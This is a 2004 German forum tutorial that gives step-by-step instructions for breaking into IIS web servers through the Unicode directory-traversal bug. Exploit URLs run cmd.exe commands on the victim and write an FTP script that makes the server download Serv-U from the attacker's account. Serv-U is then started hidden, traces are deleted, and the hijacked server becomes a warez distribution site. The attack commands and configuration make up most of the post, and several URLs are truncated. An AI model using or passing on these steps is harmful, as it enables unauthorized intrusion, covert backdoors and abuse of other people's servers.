IIS Server hacken

Dieses Thema im Forum "Security Tutorials" wurde erstellt von Morphi1985, 21. Dezember 2004 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 21. Dezember 2004
    TUT ist NICHT von mir!!!

    Also, wollen wir mal Loslegen...
    Wir brauchen auf unserer Machine folgende Programme :
    - irgendeinen funxionierenden Browser , dabei ist es egal
    ob wir Linux oder Windoof oder ein anderes Betriebssys benutzen.
    - Zu eurer eigenen Sicherheit würde ich mir ein Proxy-Tool
    suchen , ich verwende MultiProxie und habe damit gute Erfahrungen
    gemacht . Jedoch werde ich jetzt nicht erklären wie man es einrichtet ,
    denn das steht auf deren Website
    - Einen IIS-Scanner der Server nach dem Unicode-/CGI-Bug von NT Servern
    abscannt ...
    - Ein FTP-Programm ...(z.B. FlashFXP)
    - Serv-U , das wohl wichtigste Programm das wir brauchen ,
    kriegt man auch im Internet
    - Nicode ,wenn ihr bisschen rumprobieren wollt ...
    - `nen Tripod-Account (oder nen anderen FTP-zugang mit root-Rechten)

    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++



    1.)
    Als erstes installiert ihr jetzt Serv-U und konfiguriert den Port und
    die Login-Daten genau so , wie die späteren Login-Daten von dem Server
    sein sollen ... Interessant hierbei ist für uns am ende nur die
    Serv-u.exe und die Serv-u.ini...


    2.)
    Wir öffnen die Serv-U.ini , denn wir wollen noch ein bischen was dazu
    schreiben, damit uns der Admin nicht so schnell entdeckt...
    unter der Sektion [GLOBAL] fügen wir die Zeile

    INVISIBLE=TRUE ein...

    das bewirkt , das Serv-U nicht sichtbar auf dem Server gestartet wird...


    3.)
    bei eurem eingerichteten USER sollten die Zeilen ungefähr
    so aussehen :

    HomeDir=c:
    AlwaysAllowLogin=YES
    Access1=h:,RWAMCDLEP
    Access2=g:,RWAMCDLEP
    Access3=f:,RWAMCDLEP
    Access4=e:,RWAMCDLEP
    Access5=d:,RWAMCDLEP
    Access6=c:,RWAMCDLEP
    Access7=j:,RWAMCDLEP

    inklusive solltet ihr Zwei verschiedene USER eingerichtet haben
    einmal euer Zugang , der die kompletten Schreibrechte hat (s.o)
    und einen Zugang für remote-USER , die zB keine Schreibrechte haben
    sollen, der remote-USER account würde ungefähr so aussehen:

    Access1=c:,RLP
    Access2=d:,RLP (usw.)


    4.)
    Danach brauchen wir unseren Tripod-Account ;P ,
    dort laden wir ins root-Verzeichniss unsere Serv-U.exe und unsere
    konfigurierte Serv-U.ini...
    mehr brauchen wir dort erst mal nicht machen .


    5.)
    Jetzt benutzen wir den IIS-Scanner und suchen uns eine Range aus
    erfahrene Scanner gucken im IP-Index nach, oder man nimmt eine
    Hostlookup-Engine um Die Ip einer Site rauszufinden ...
    nun geben wir in unserem IIS-Scanner eine nette Range ein , die ihr
    euch ausgeguckt habt, und wir scannen ein bischen (kann manchmal auch
    recht lange dauern).
    Wenn uns dann der Scanner Einen Server anzeigt sollten wir uns mal die
    IP schnappen...


    6.)
    Nun starten wir den InternetExplorer und geben folgende zeile ein

    http://##IP##/scripts/..%%35c..%%35cwinn...d.exe?/c+dir+c:

    ##IP## steht hierbei für die IP des gescannten Servers ...
    mit dieser Zeile machen wir uns den Unicode Bug zunutze
    denn dieser String (/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c)
    bewirkt das man ins root-Verzeichniss des InetPub gelangt ..
    und mit +dir+c: kriegen wir den gesamten Inhalt des Laufwerkes c:
    zu Gesichte ... schön oder ?
    und genau das machen wir uns zu nutze , denn wir können alle Dos-Befehle
    zu unseren Zwecken nutzen mit diesem Bug ...


    7.)
    WIR erstellen uns nun ein Verzeichnis wo wir unser kleines Serv-U
    platzieren wollen ; dieses Verzeichniss sollte nach Möglichkeit
    unauffällig sein damit
    der Admin keinen Verdacht schöpft ...

    http://ip/scripts/..%5c..%5cwinnt/system...ir+c:winntsyste m32temporary
    Manchmal haben wir aber keine Schreibrechte für WINNT-Unterverzeichnisse,
    also müssen wir improvisieren :

    http://ip/scripts/..%5c..%5cwinnt/system...ir+c:tempetcetc etc
    d.h. ihr könnt euch nen verzeichniss nach euren Wünschen erstellen
    wenn das Verzeichniss erstellt wurde , kommt eine CGI-Fehlermeldung...


    8.)
    Nun schauen wir ob das Verzeichniss tatsächlich existiert :

    http://ip/scripts/..%5c..%5cwinnt/system...+c:winntsystem3 2 emporary

    den Pfad müsstet ihr nach eurem anpassen
    wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich ..


    9.)
    http://ip/scripts/..%5c..%5cwinnt/system...y+c:winntsystem 32cmd.exe+superlol.exe

    dies brauchen wir um uns den Dos-Echo Befehl zu nutzen, damit wir auch
    eine Datei erstellen können
    und in jene auch schreiben können ...


    10.)
    Darauf erstellen wir in unserem Verzeichniss eine .txt Datei
    welche wir als FTP-Script nutzen , damit sich der Server per FTP auf
    unserem Tripod-Account einwählt und sich dann Serv-U.exe -.ini downloadet..

    http://ip/scripts/superlol.exe?/c+echo+o...VER##+##PORT##& gt;>c:winntsystem32 emporaryftpscr.txt

    http://ip/scripts/superlol.exe?/c+echo+##USERNAME##>>c:winntsystem 32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+##PASSWORD##>>c:winntsystem 32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:winntsystem32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:winntsyst em32temporaryftpscr.txt


    http://IP/scripts/superlol.exe?/c+echo+get+servu.ini>>c:winntsyste m32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+quit>>c:winntsystem32 emporaryftpscr.txt

    Diese Zeilen geben wir nach einander ein im browser , dadurch werden die
    commandos für den Server
    geschrieben ...
    Sollte doch eigentlich klar sein , was das bedeutet ;P


    11.)
    schauen wir uns die Datei erst nocheinmal an, ob auch alles richtig ist...
    wenn jetzt folgendes Erscheint ist alles okay *grins*:

    http://ip/scripts/superlol.exe?/c+type+c:winntsystem32 emporaryftpscr.txt

    open ##IP-VOM-FTP-SERVER##
    ##USERNAME##
    ##PASSWORD##

    BINARY
    get serv-u.exe
    get serv-u.ini
    quit


    12.)
    http://ip/scripts/..%5c..%5cwinnt/system...+-s:c:winntsyst em32 emporaryftpscr.txt
    mit dieser Zeile führen wir nun unser kleines Script aus ...
    und der Server connected nun zu eurem Tripod-Account und holt sich euer
    Serv-U :p


    13.)
    jedoch liegen die Dateien nun im InetPub Verzeichniss des Servers , da wir
    aber jene in unser
    eigenes Verzeichniss verschieben wollen geben wir folgendes ein :

    http://ip/scripts/superlol.exe?/c+move+serv-u*.*+"c:winntsystem32 emporary"


    14.)
    Um unsere Spuren zu verwischen löschen wir vorsichtshalber noch einmal die
    Script Datei

    http://ip/scripts/superlol.exe?/c+del+ c:winntsystem32 emporaryftpscr.txt+/Q/F


    15.)
    http://ip/scripts/superlol.exe?/c+dir+c:winntsystem32 emporary

    jetzt schauen wir nach ob Serv-u.exe und Serv-u.ini sich in unserem
    Verzeichniss befinden
    und ob die Script Datei gelöscht wurde ...
    wenn alles in Ordnung ist können wir jetzt weitermachen


    16.)
    Anschließend führen wir Serv-U auf dem Server aus ...
    mit folgendem Befehl ist uns jenes auch sofort möglich ...

    http://ip/scripts/superlol.exe?/c+c:winn...yserv-u.exe+ser v-u.ini

    man sollte ein paar Sekunden warten bevor man mit Versucht sich mit dem
    FTP Proggy einzuloggen...
    Wenn man Pech hat , dann hat man einen Server mit Firewall erwischt , das
    merkt man einfach daran das man
    nicht connecten kann ...
    wenn alles klappt könnt ihr euch aber mit euren Serv-U Einstellungen nun
    Problemlos einloggen ...


    17.)
    Jetzt sind wir im Root Verzeichniss des Servers... und haben auch volle
    Schreibrechte...
    Als nächstes suchen wir uns ein Unterverezeichniss oder erstellen eins, welches
    wir als das Verzeichniss benutzen
    wollen wo wir uploaden wollen...
    wenn dies geschehn ist müsst ihr nochmal die Serv-u.ini öffnen und jene
    jetzt anpassen :
    euer Account mit den Schreibrechten müsste dann so aussehen (Bsp.):

    HomeDir=d:MelindaWORKsampleLESSONnew:mad:

    AlwaysAllowLogin=YES
    Access1=h:,RWAMCDLEP
    Access2=g:,RWAMCDLEP
    Access3=f:,RWAMCDLEP
    Access4=e:,RWAMCDLEP
    Access5=d:,RWAMCDLEP
    Access6=c:,RWAMCDLEP
    Access7=j:,RWAMCDLEP
    RelPaths=YES

    und der Account zum Leechen so :

    HomeDir=d:MelindaWORKsampleLESSONnew:mad:

    RelPaths=YES
    Access1=d:MelindaWORKsampleLESSONnew:mad:,RLP


    18.)
    nun gehen wir nochmal in das Verzeichniss wo unser Serv-U liegt und
    überschreiben
    die INI datei mit unserer neuen ...


    19.)
    wir reconnecten , und nun müssten wir in unserem Verezeichniss landen
    und man sollte es als root-Verzeichniss sehen...


    20.)
    ENDLICH könnt ihr euren gehackten Pub fillen...
    Das gute an Serv-u ist , das nun der Server Fxp-able und Resumeable ist...
    gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
    euren
    Stuff deleten... !!!!!!!!!!!!:mad: DeLeTeR`S!!!!!!!!!!!!!!

    21.)
    enJoY

    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++


    das nun der Server Fxp-able und Resumeable ist...
    gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
    euren
    Stuff deleten... !!!!!!!!!!!!:mad: DeLeTeR`S!!!!!!!!!!!!!!
     

  2. Anzeige

  3. Videos zum Thema
Die Seite wird geladen...
Similar Threads - IIS Server hacken
  1. Antworten:
    2
    Aufrufe:
    1.189
  2. Antworten:
    1
    Aufrufe:
    1.081
  3. Antworten:
    20
    Aufrufe:
    1.327
  4. Antworten:
    0
    Aufrufe:
    264
  5. Antworten:
    0
    Aufrufe:
    225